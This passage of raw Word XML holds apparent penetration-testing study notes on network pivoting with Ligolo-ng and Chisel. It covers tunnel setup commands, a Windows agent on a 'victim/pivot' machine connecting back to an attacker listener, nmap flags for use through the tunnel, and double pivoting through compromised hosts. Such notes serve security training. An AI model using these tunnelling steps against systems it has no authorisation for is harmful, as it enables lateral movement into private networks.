      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo allows for a seamless VPN-like experience. No need to worry about SOCKS or proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel is a lot quicker to set up, but then you have to worry about whether your tools are compatible with SOCKS and Proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They both are almost always available to use since they require a reverse connection and no specific ports need to be open on the pivot machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, try and use Ligolo if you can since it's a lot more seamless to use</w:t>
      </w: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Using NMAP in Ligolo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When using nmap, you should use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--unprivileged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-PE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to avoid false positives.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vmr4ia63ojri" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Guide:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap add user kali mode tun ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add &lt;subnet&gt;/24 dev ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./proxy -selfcert -laddr 0.0.0.0:4443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DON'T USE ANY PORT BELOW 1024 or else u need admin on pivot machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\agent.exe -connect 192.168.45.232:4443 -ignore-cert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>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t xml:space="preserve">If you ever need to double pivot, just download agent.exe on that latest compromised machine and then connect to that session via Ligolo and now you can access that machine via Ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shown here (very easy) </w:t>
      </w:r>
      <w:hyperlink r:id="rId172">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a MUCH more concise guide too: </w:t>
      </w:r>
      <w:hyperlink r:id="rId173">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@0x47M4D/double-pivoting-using-ligolo-ng-3b4094363ff2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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ztxh7fm0v6o" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId174">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ligolo-NG Github Release Page</w:t>
        </w:r>
      </w:hyperlink>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commentRangeStart w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For your setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali attacker → download </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary (Linux version).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ligolo-ng_proxy_</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.8.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_linux_amd64.tar.gz </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On victim/pivot → upload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">agent </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary (Windows or Linux depending on the target).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo-ng_agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_0.8.2_</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows_amd64.zip </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit windows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Unzip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar -xvzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz -C ligolo   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it's a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .tar.gzip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can unzip it using this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x = extract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v = verbose (shows files being extracted)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">z = unzip for .gz </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f = file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-C  ligolo = unzip into ligolo folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip ligolo-ng_agent_0.8.2_windows_amd64.zip -d ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump contents into ligolo directory</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Then on your Kali (or if your victim is a Linux), make it executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4gwilwxd1wmm" w:id="59"/>
